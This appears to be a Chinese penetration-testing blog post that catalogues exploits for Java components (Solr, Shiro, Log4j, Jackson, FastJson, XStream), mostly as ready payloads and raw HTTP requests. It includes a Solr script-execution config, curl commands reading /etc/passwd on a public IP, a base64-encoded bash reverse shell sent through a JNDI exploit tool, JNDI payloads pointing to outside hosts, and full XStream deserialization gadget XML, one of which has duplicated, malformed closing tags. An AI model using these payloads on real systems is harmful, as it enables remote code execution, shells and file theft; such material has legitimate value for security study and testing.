java组件安全

Solr

默认端口:8983

命令执行(cve-2019-17558)

影响版本:5.0.0-8.3.1

https://github.com/jas502n/solr_rce

远程命令执行(cve-2019-0193)

影响版本:<8.2.0

条件:DataImportHandler模块和Admin UI未开启鉴权

选择Dataimport功能并选择debug模式,填入以下POC:

<dataConfig>
	<dataSource type="URLDataSource"/>
    <script><![CDATA[
    		function poc(){ java.lang.Runtime.getRuntime().exec("touch /tmp/success");          }  ]]></script>
       <document>    
          <entity name="stackoverflow"            						   url="https://stackoverflow.com/feeds/tag/solr"            processor="XPathEntityProcessor"            forEach="/feed"            transformer="script:poc" />
   </document> 
</dataConfig>

点击Execute with this Confuguration会发送以下请求包:

POST /solr/test/dataimport?_=1565835261600&indent=on&wt=json HTTP/1.1 
Host: localhost:8983 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0 
Accept: application/json, text/plain, */* 
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 
Accept-Encoding: gzip, deflate 
Content-type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest 
Content-Length: 679 
Connection: close 
Referer: http://localhost:8983/solr/ 
Cookie: csrftoken=gzcSR6Sj3SWd3v4ZxmV5OcZuPKbOhI6CMpgp5vIMvr5wQAL4stMtxJqL2sUE8INi; sessionid=snzojzqa5zn187oghf06z6xodulpohpr 

command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22touch+%2Ftmp%2Fsuccess%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport

执行docker compose exec solr ls /tmp,可见/tmp/success已成功创建:

文件读取&SSRF (CVE-2021-27905)

全版本官方拒绝修复漏洞

获取数据库名

http://47.94.236.117:8983/solr/admin/cores?indexInfo=false\&wt=json

触发漏洞

curl -i -s -k -X $'POST'

-H $'Content-Type: application/json' --data-binary $'{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'

$'http://47.94.236.117:8983/solr/demo/config'

任意文件读取

curl -i -s -k 'http://47.94.236.117:8983/solr/demo/debug/dump?param=ContentStreams\&stream.url=file:///etc/passwd'

Shiro

CVE_2016_4437 Shiro-550+Shiro-721(RCE)

影响版本:<=1.2.4

CVE-2020-11989(身份认证绕过)

影响版本:<1.7.1

POC:/admin/%20

这里admin指的是需要鉴权的目录

CVE-2020-1957(身份认证绕过)

影响版本:<1.5.3

Poc:/xxx/...;/admin/

CVE-2022-32532(身份验证绕过)

影响版本:<1.9.1

Poc: /permit/any

Log4j

是一个基于Java的日志记录框架。

l流量特征:${jndi:rmi:///}

Log4j2远程命令执行(CVE-2021-44228)

影响版本:Apache Log4j2 2.0 - 2.15.0-rc1

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTcuNzIuMTIwLjIyLzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}" -A 117.72.120.22

中间的是base64编码的命令

将粉色字体payload替换进payload

Payload:${jndi:rmi://117.72.120.22:1099/x83lta}

url编码后,填在参数值

执行后发现有请求变化

成功反弹shell

Jackson

当下流行的json解释器,主要负责处理Json的序列化和反序列化

代码执行(cve-2020-8840)

条件:

开启enableDefaultTyping()

使用了org.apache.xbean.propertyeditor.JndiConverter第三方依赖

java 复制代码
payload:String json = "[\"org.apache.xbean.propertyeditor.JndiConverter\", {\"asText\":\"ldap://117.72.120.22:1389/r8f7d5\"}]";

使用jndi注入工具生成ldap

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTcuNzIuMTIwLjIyLzg4ODggMD4mMQ==}|e64,-d}|{bash,-i}" -A 117.72.120.22

POC数据包:

POST /Jacksondatabind/attack HTTP/1.1

Host: 123.58.224.8:30331

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/ ;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate, br

Connection: keep-alive

Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1731237435

Upgrade-Insecure-Requests: 1

Priority: u=0, i

Content-Type: application/json

Content-Length: 102

content=["org.apache.xbean.propertyeditor.JndiConverter",{"asText":"rmi://117.72.120.22:1099/mqqwtd"}]

这里我复现失败了

代码执行 (cve-2020-35728)

影响版本:FasterXML jackson-databind 2.x < 2.9.10.8

payload:

java 复制代码
String payload = "[\"com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool\",{\"jndiPath\":\"rmi://47.94.236.117:1099/gtaafz\"}]";

访问路径/Jacksondatabind/attack会出现报错

复现数据包和cve-2020-35728一模一样

FastJson

阿里巴巴公司开源的json解析器,它可以解析JSON格式的字符串,支持将JavaBean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。

重点就是:不同版本的fastjson,不同的poc

<=1.2.14

poc:

{

"b":{

"@type":"com.sun.rowset.JdbcRowSetImpl",

"dataSourceName":"rmi://evil.com:9999/TouchFile",

"autoCommit":true

}

}
<=1.2.47

{

"a":{

"@type":"java.lang.Class",

"val":"com.sun.rowset.JdbcRowSetImpl"

},

"b":{

"@type":"com.sun.rowset.JdbcRowSetImpl",

"dataSourceName":"rmi://evil.com:9999/Exploit",

"autoCommit":true

}

}

XStream

代码执行 (CVE-2021-21351)

影响版本:<=1.4.15

使用JNDI注入

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTcuNzIuMTIwLjIyLzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}" -A 117.72.120.22

数据包:

xml 复制代码
POST / HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: application/xml
Content-Length: 3184

<sorted-set>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>ysomap</type>
    <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>
      <m__DTMXRTreeFrag>
        <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>
          <m__size>-10086</m__size>
          <m__mgrDefault>
            <__overrideDefaultParser>false</__overrideDefaultParser>
            <m__incremental>false</m__incremental>
            <m__source__location>false</m__source__location>
            <m__dtms>
              <null/>
            </m__dtms>
            <m__defaultHandler/>
          </m__mgrDefault>
          <m__shouldStripWS>false</m__shouldStripWS>
          <m__indexing>false</m__indexing>
          <m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>
            <fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>
              <javax.sql.rowset.BaseRowSet>
                <default>
                  <concurrency>1008</concurrency>
                  <escapeProcessing>true</escapeProcessing>
                  <fetchDir>1000</fetchDir>
                  <fetchSize>0</fetchSize>
                  <isolation>2</isolation>
                  <maxFieldSize>0</maxFieldSize>
                  <maxRows>0</maxRows>
                  <queryTimeout>0</queryTimeout>
                  <readOnly>true</readOnly>
                  <rowSetType>1004</rowSetType>
                  <showDeleted>false</showDeleted>
                  <dataSource>rmi://evil-ip:1099/example</dataSource>
                  <listeners/>
                  <params/>
                </default>
              </javax.sql.rowset.BaseRowSet>
              <com.sun.rowset.JdbcRowSetImpl>
                <default/>
              </com.sun.rowset.JdbcRowSetImpl>
            </fPullParserConfig>
            <fConfigSetInput>
              <class>com.sun.rowset.JdbcRowSetImpl</class>
              <name>setAutoCommit</name>
              <parameter-types>
                <class>boolean</class>
              </parameter-types>
            </fConfigSetInput>
            <fConfigParse reference='../fConfigSetInput'/>
            <fParseInProgress>false</fParseInProgress>
          </m__incrementalSAXSource>
          <m__walker>
            <nextIsRaw>false</nextIsRaw>
          </m__walker>
          <m__endDocumentOccured>false</m__endDocumentOccured>
          <m__idAttributes/>
          <m__textPendingStart>-1</m__textPendingStart>
          <m__useSourceLocationProperty>false</m__useSourceLocationProperty>
          <m__pastFirstElement>false</m__pastFirstElement>
        </m__dtm>
        <m__dtmIdentity>1</m__dtmIdentity>
      </m__DTMXRTreeFrag>
      <m__dtmRoot>1</m__dtmRoot>
      <m__allowRelease>false</m__allowRelease>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>ysomap</type>
    <value class='com.sun.org.apache.xpath.internal.objects.XString'>
      <m__obj class='string'>test</m__obj>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>

我复现失败

代码执行 (CVE-2021-29505)

影响版本:<=1.4.16

xml 复制代码
POST / HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: application/xml
Content-Length: 3169

<java.util.PriorityQueue serialization='custom'>
    <unserializable-parents/>
    <java.util.PriorityQueue>
        <default>
            <size>2</size>
        </default>
        <int>3</int>
        <javax.naming.ldap.Rdn_-RdnEntry>
            <type>12345</type>
            <value class='com.sun.org.apache.xpath.internal.objects.XString'>
                <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
            </value>
        </javax.naming.ldap.Rdn_-RdnEntry>
        <javax.naming.ldap.Rdn_-RdnEntry>
            <type>12345</type>
            <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
                <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
                    <parsedMessage>true</parsedMessage>
                    <soapVersion>SOAP_11</soapVersion>
                    <bodyParts/>
                    <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
                        <attachmentsInitialized>false</attachmentsInitialized>
                        <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
                            <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
                                <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
                                    <names>
                                        <string>aa</string>
                                        <string>aa</string>
                                    </names>
                                    <ctx>
                                        <environment/>
                                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
                                            <java.rmi.server.RemoteObject>
                                                <string>UnicastRef</string>
                                                <string>evil-ip</string>
                                                <int>1099</int>
                                                <long>0</long>
                                                <int>0</int>
                                                <long>0</long>
                                                <short>0</short>
                                                <boolean>false</boolean>
                                            </java.rmi.server.RemoteObject>
                                        </registry>
                                        <host>evil-ip</host>
                                        <port>1099</port>
                                    </ctx>
                                </candidates>
                            </aliases>
                        </nullIter>
                    </sm>
                </message>
            </value>
        </javax.naming.ldap.Rdn_-RdnEntry>
    </java.util.PriorityQueue>
</java.util.PriorityQueue>
           <host>evil-ip</host>
                                    <port>1099</port>
                                </ctx>
                            </candidates>
                        </aliases>
                    </nullIter>
                </sm>
            </message>
        </value>
    </javax.naming.ldap.Rdn_-RdnEntry>
</java.util.PriorityQueue>

</java.util.PriorityQueue>

[Vulhub - Docker-Compose file for vulnerability environment](https://vulhub.org/#/environments/xstream/CVE-2021-29505/)
相关推荐
黑客老陈4 小时前
面试经验分享 | 北京渗透测试岗位
运维·服务器·经验分享·安全·web安全·面试·职场和发展
安全方案9 小时前
如何识别钓鱼邮件和诈骗网站?(附网络安全意识培训PPT资料)
网络安全·安全培训
H轨迹H12 小时前
SolidState靶机通关教程及提权
网络安全·渗透测试·靶机·oscp
独行soc13 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍11基于XML的SQL注入(XML-Based SQL Injection)
数据库·安全·web安全·漏洞挖掘·sql注入·hw·xml注入
D1TAsec13 小时前
Powercat 无文件落地执行技巧,你确定不进来看看?
网络安全
文大。14 小时前
2024年广西职工职业技能大赛-Spring
java·spring·网络安全
风间琉璃""14 小时前
bugkctf 渗透测试1超详细版
数据库·web安全·网络安全·渗透测试·内网·安全工具
儒道易行15 小时前
【DSVW】攻防实战全记录
web安全·网络安全
安全方案17 小时前
如何增强网络安全意识?(附培训PPT资料)
网络·安全·web安全